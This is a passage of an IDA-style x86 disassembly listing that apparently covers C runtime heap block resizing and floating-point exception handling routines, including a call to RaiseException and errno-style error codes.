add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_413CD0
loc_413D09: ; CODE XREF: sub_413C60+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_413D46
or [eax+4], edi
loc_413D46: ; CODE XREF: sub_413C60+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_413D56: ; CODE XREF: sub_413C60+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_413C60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D5B proc near ; CODE XREF: sub_41237F+58�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_413F09
test bl, 1
jnz loc_413F02
add ebx, ecx
cmp esi, ebx
jg loc_413F02
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_413DD2
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_413DD2: ; CODE XREF: sub_413D5B+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_413E22
cmp ecx, 20h
jnb short loc_413DFE
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_413E22
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_413E22
; ---------------------------------------------------------------------------
loc_413DFE: ; CODE XREF: sub_413D5B+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_413E22
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_413E22: ; CODE XREF: sub_413D5B+7D�j
; sub_413D5B+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_413EF0
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_413E5C
push 3Fh
pop edi
loc_413E5C: ; CODE XREF: sub_413D5B+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_413EDE
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_413EB5
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_413EA8
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_413EA8: ; CODE XREF: sub_413D5B+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_413EDA
; ---------------------------------------------------------------------------
loc_413EB5: ; CODE XREF: sub_413D5B+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_413ECB
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_413ECB: ; CODE XREF: sub_413D5B+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_413EDA: ; CODE XREF: sub_413D5B+158�j
shr edx, cl
or [eax], edx
loc_413EDE: ; CODE XREF: sub_413D5B+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_413EF3
; ---------------------------------------------------------------------------
loc_413EF0: ; CODE XREF: sub_413D5B+E5�j
mov edx, [ebp+arg_4]
loc_413EF3: ; CODE XREF: sub_413D5B+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_414049
; ---------------------------------------------------------------------------
loc_413F02: ; CODE XREF: sub_413D5B+52�j
; sub_413D5B+5C�j
xor eax, eax
jmp loc_41404C
; ---------------------------------------------------------------------------
loc_413F09: ; CODE XREF: sub_413D5B+49�j
jge loc_414049
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_413F34
push 3Fh
pop esi
loc_413F34: ; CODE XREF: sub_413D5B+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_413FC3
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_413F4D
push 3Fh
pop esi
loc_413F4D: ; CODE XREF: sub_413D5B+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_413F9C
cmp esi, 20h
jnb short loc_413F78
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_413F99
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_413F99
; ---------------------------------------------------------------------------
loc_413F78: ; CODE XREF: sub_413D5B+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_413F99
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_413F99: ; CODE XREF: sub_413D5B+214�j
; sub_413D5B+21B�j ...
mov ebx, [ebp+arg_4]
loc_413F9C: ; CODE XREF: sub_413D5B+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_413FC3
push 3Fh
pop esi
loc_413FC3: ; CODE XREF: sub_413D5B+1DD�j
; sub_413D5B+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_414040
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_414017
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41400A
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41400A: ; CODE XREF: sub_413D5B+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41403C
; ---------------------------------------------------------------------------
loc_414017: ; CODE XREF: sub_413D5B+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41402D
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41402D: ; CODE XREF: sub_413D5B+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41403C: ; CODE XREF: sub_413D5B+2BA�j
shr edx, cl
or [eax], edx
loc_414040: ; CODE XREF: sub_413D5B+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_414049: ; CODE XREF: sub_413D5B+1A2�j
; sub_413D5B:loc_413F09�j
push 1
pop eax
loc_41404C: ; CODE XREF: sub_413D5B+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_413D5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_414051(int,int,double,int)
sub_414051 proc near ; CODE XREF: sub_410CB2+51�p
; sub_410DFB+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_42EB08, 0
jnz short loc_414086
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_414606
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_414086: ; CODE XREF: sub_414051+A�j
push 0FFFFh
mov ds:dword_45F844, 21h
push [ebp+arg_C]
call sub_414879
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_414051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4140A4(int,int,double,double,int)
sub_4140A4 proc near ; CODE XREF: sub_410CB2:loc_410D75�p
; sub_410DFB:loc_410EBE�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_4143EF
add esp, 0Ch
test eax, eax
jnz short loc_4140E2
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_41413C
add esp, 18h
loc_4140E2: ; CODE XREF: sub_4140A4+1A�j
push [ebp+arg_0]
call sub_4146D9
cmp ds:dword_42EB08, 0
pop ecx
jnz short loc_414120
test eax, eax
jz short loc_414120
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_414606
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_414120: ; CODE XREF: sub_4140A4+4E�j
; sub_4140A4+52�j
push eax
call sub_41468E
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_414879
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_4140A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41413C proc near ; CODE XREF: sub_4140A4+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_41416E
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_41416E: ; CODE XREF: sub_41413C+23�j
test cl, 2
jz short loc_414181
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_414181: ; CODE XREF: sub_41413C+35�j
test cl, bl
jz short loc_414193
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_414193: ; CODE XREF: sub_41413C+47�j
test cl, 4
jz short loc_4141A6
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_4141A6: ; CODE XREF: sub_41413C+5A�j
test cl, 8
jz short loc_4141B9
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_4141B9: ; CODE XREF: sub_41413C+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_41485C
test al, bl
jz short loc_414242
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_414242: ; CODE XREF: sub_41413C+FD�j
test al, 4
jz short loc_41424D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_41424D: ; CODE XREF: sub_41413C+108�j
test al, 8
jz short loc_414258
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_414258: ; CODE XREF: sub_41413C+113�j
test al, 10h
jz short loc_414262
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_414262: ; CODE XREF: sub_41413C+11E�j
test al, 20h
jz short loc_41426C
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_41426C: ; CODE XREF: sub_41413C+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_4142AB
cmp eax, 400h
jz short loc_41429D
cmp eax, 800h
jz short loc_414291
cmp eax, ecx
jnz short loc_4142B1
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_4142B1
; ---------------------------------------------------------------------------
loc_414291: ; CODE XREF: sub_41413C+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_4142A7
; ---------------------------------------------------------------------------
loc_41429D: ; CODE XREF: sub_41413C+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_4142A7: ; CODE XREF: sub_41413C+15F�j
mov [eax], ecx
jmp short loc_4142B1
; ---------------------------------------------------------------------------
loc_4142AB: ; CODE XREF: sub_41413C+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_4142B1: ; CODE XREF: sub_41413C+14B�j
; sub_41413C+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_4142DC
cmp eax, 200h
jz short loc_4142CF
cmp eax, ecx
jnz short loc_4142E9
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_4142E9
; ---------------------------------------------------------------------------
loc_4142CF: ; CODE XREF: sub_41413C+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_4142E7
; ---------------------------------------------------------------------------
loc_4142DC: ; CODE XREF: sub_41413C+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_4142E7: ; CODE XREF: sub_41413C+19E�j
mov [eax], ecx
loc_4142E9: ; CODE XREF: sub_41413C+189�j
; sub_41413C+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_41486A
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_41C16C ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_414363
and dword ptr [esi], 0FFFFFFFEh
loc_414363: ; CODE XREF: sub_41413C+222�j
test byte ptr [eax+8], 8
jz short loc_41436C
and dword ptr [esi], 0FFFFFFFBh
loc_41436C: ; CODE XREF: sub_41413C+22B�j
test byte ptr [eax+8], 4
jz short loc_414375
and dword ptr [esi], 0FFFFFFF7h
loc_414375: ; CODE XREF: sub_41413C+234�j
test byte ptr [eax+8], 2
jz short loc_41437E
and dword ptr [esi], 0FFFFFFEFh
loc_41437E: ; CODE XREF: sub_41413C+23D�j
test [eax+8], bl
jz short loc_414386
and dword ptr [esi], 0FFFFFFDFh
loc_414386: ; CODE XREF: sub_41413C+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_4143BA
dec ecx
jz short loc_4143AE
dec ecx
jz short loc_4143A4
dec ecx
jnz short loc_4143BC
or byte ptr [esi+1], 0Ch
jmp short loc_4143BC
; ---------------------------------------------------------------------------
loc_4143A4: ; CODE XREF: sub_41413C+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_4143B6
; ---------------------------------------------------------------------------
loc_4143AE: ; CODE XREF: sub_41413C+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_4143B6: ; CODE XREF: sub_41413C+270�j
mov [esi], ecx
jmp short loc_4143BC
; ---------------------------------------------------------------------------
loc_4143BA: ; CODE XREF: sub_41413C+257�j
and [esi], edx
loc_4143BC: ; CODE XREF: sub_41413C+260�j
; sub_41413C+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_4143DC
dec ecx
jz short loc_4143D3
dec ecx
jnz short loc_4143E5
and [esi], edx
jmp short loc_4143E5
; ---------------------------------------------------------------------------
loc_4143D3: ; CODE XREF: sub_41413C+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_4143E3
; ---------------------------------------------------------------------------
loc_4143DC: ; CODE XREF: sub_41413C+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_4143E3: ; CODE XREF: sub_41413C+29E�j
mov [esi], ecx
loc_4143E5: ; CODE XREF: sub_41413C+291�j
; sub_41413C+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41413C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143EF proc near ; CODE XREF: sub_4140A4+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_41441A
test byte ptr [ebp+arg_8], bl
jz short loc_41441A
push ebx
call sub_41489C
pop ecx
and edi, 0FFFFFFF7h
jmp loc_4145E4
; ---------------------------------------------------------------------------
loc_41441A: ; CODE XREF: sub_4143EF+15�j
; sub_4143EF+1A�j
test al, 4
jz short loc_414434
test byte ptr [ebp+arg_8], 4
jz short loc_414434
push 4
call sub_41489C
pop ecx
and edi, 0FFFFFFFBh
jmp loc_4145E4
; ---------------------------------------------------------------------------
loc_414434: ; CODE XREF: sub_4143EF+2D�j
; sub_4143EF+33�j
test al, bl
jz loc_41450E
test byte ptr [ebp+arg_8], 8
jz loc_41450E
push 8
call sub_41489C
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_4144E6
cmp ecx, 400h
jz short loc_4144BE
cmp ecx, 800h
jz short loc_414496
cmp ecx, eax
jnz loc_414506
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_41C790
fld ds:dbl_42E498
fnstsw ax
sahf
ja short loc_41448E
fchs
loc_41448E: ; CODE XREF: sub_4143EF+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_414504
; ---------------------------------------------------------------------------
loc_414496: ; CODE XREF: sub_4143EF+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_41C790
fnstsw ax
sahf
jbe short loc_4144AE
fld ds:dbl_42E488
jmp short loc_4144B6
; ---------------------------------------------------------------------------
loc_4144AE: ; CODE XREF: sub_4143EF+B5�j
fld ds:dbl_42E498
fchs
loc_4144B6: ; CODE XREF: sub_4143EF+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_414504
; ---------------------------------------------------------------------------
loc_4144BE: ; CODE XREF: sub_4143EF+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_41C790
fnstsw ax
sahf
jbe short loc_4144D6
fld ds:dbl_42E498
jmp short loc_4144DE
; ---------------------------------------------------------------------------
loc_4144D6: ; CODE XREF: sub_4143EF+DD�j
fld ds:dbl_42E488
fchs
loc_4144DE: ; CODE XREF: sub_4143EF+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_414504
; ---------------------------------------------------------------------------
loc_4144E6: ; CODE XREF: sub_4143EF+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_41C790
fld ds:dbl_42E488
fnstsw ax
sahf
ja short loc_4144FE
fchs
loc_4144FE: ; CODE XREF: sub_4143EF+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_414504: ; CODE XREF: sub_4143EF+A5�j
; sub_4143EF+CD�j ...
fstp qword ptr [ecx]
loc_414506: ; CODE XREF: sub_4143EF+81�j
and edi, 0FFFFFFFEh
jmp loc_4145E4
; ---------------------------------------------------------------------------
loc_41450E: ; CODE XREF: sub_4143EF+47�j
; sub_4143EF+51�j
test al, 2
jz loc_4145E4
test byte ptr [ebp+arg_8], 10h
jz loc_4145E4
push esi
xor esi, esi
test al, 10h
jz short loc_414529
mov esi, ebx
loc_414529: ; CODE XREF: sub_4143EF+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp ds:dbl_41C790
fnstsw ax
sahf
jz loc_4145D2
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_41479B
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_414574
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_4145C8
; ---------------------------------------------------------------------------
loc_414574: ; CODE XREF: sub_4143EF+17A�j
fld [ebp+var_C]
fcomp ds:dbl_41C790
fnstsw ax
sahf
jnb short loc_414586
mov edx, ebx
jmp short loc_414588
; ---------------------------------------------------------------------------
loc_414586: ; CODE XREF: sub_4143EF+191�j
xor edx, edx
loc_414588: ; CODE XREF: sub_4143EF+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_4145BC
sub eax, ecx
loc_41459F: ; CODE XREF: sub_4143EF+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_4145AA
test esi, esi
jnz short loc_4145AA
mov esi, ebx
loc_4145AA: ; CODE XREF: sub_4143EF+1B3�j
; sub_4143EF+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_4145B6
or byte ptr [ebp+var_C+3], 80h
loc_4145B6: ; CODE XREF: sub_4143EF+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41459F
loc_4145BC: ; CODE XREF: sub_4143EF+1AC�j
test edx, edx
jz short loc_4145C8
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_4145C8: ; CODE XREF: sub_4143EF+183�j
; sub_4143EF+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_4145D4
; ---------------------------------------------------------------------------
loc_4145D2: ; CODE XREF: sub_4143EF+14E�j
mov esi, ebx
loc_4145D4: ; CODE XREF: sub_4143EF+1E1�j
test esi, esi
pop esi
jz short loc_4145E1
push 10h
call sub_41489C
pop ecx
loc_4145E1: ; CODE XREF: sub_4143EF+1E8�j
and edi, 0FFFFFFFDh
loc_4145E4: ; CODE XREF: sub_4143EF+26�j
; sub_4143EF+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_4145FB
test byte ptr [ebp+arg_8], 20h
jz short loc_4145FB
push 20h
call sub_41489C
pop ecx
and edi, 0FFFFFFEFh
loc_4145FB: ; CODE XREF: sub_4143EF+1F9�j
; sub_4143EF+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_4143EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_414606(int,int,int,int,int,int,double,int)
sub_414606 proc near ; CODE XREF: sub_414051+2B�p
; sub_4140A4+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_4146B4
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_414671
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_414879
lea eax, [ebp+var_20]
push eax
call sub_41822D
add esp, 0Ch
test eax, eax
jnz short loc_41466B
push esi
call sub_41468E
pop ecx
loc_41466B: ; CODE XREF: sub_414606+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_414671: ; CODE XREF: sub_414606+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_414879
push [ebp+arg_0]
call sub_41468E
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_414606 endp
; =============== S U B R O U T I N E =======================================
sub_41468E proc near ; CODE XREF: sub_4140A4+7D�p
; sub_414606+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_4146A9
jle short locret_4146B3
cmp eax, 3
jg short locret_4146B3
mov ds:dword_45F844, 22h
retn
; ---------------------------------------------------------------------------
loc_4146A9: ; CODE XREF: sub_41468E+7�j
mov ds:dword_45F844, 21h
locret_4146B3: ; CODE XREF: sub_41468E+9�j
; sub_41468E+E�j
retn
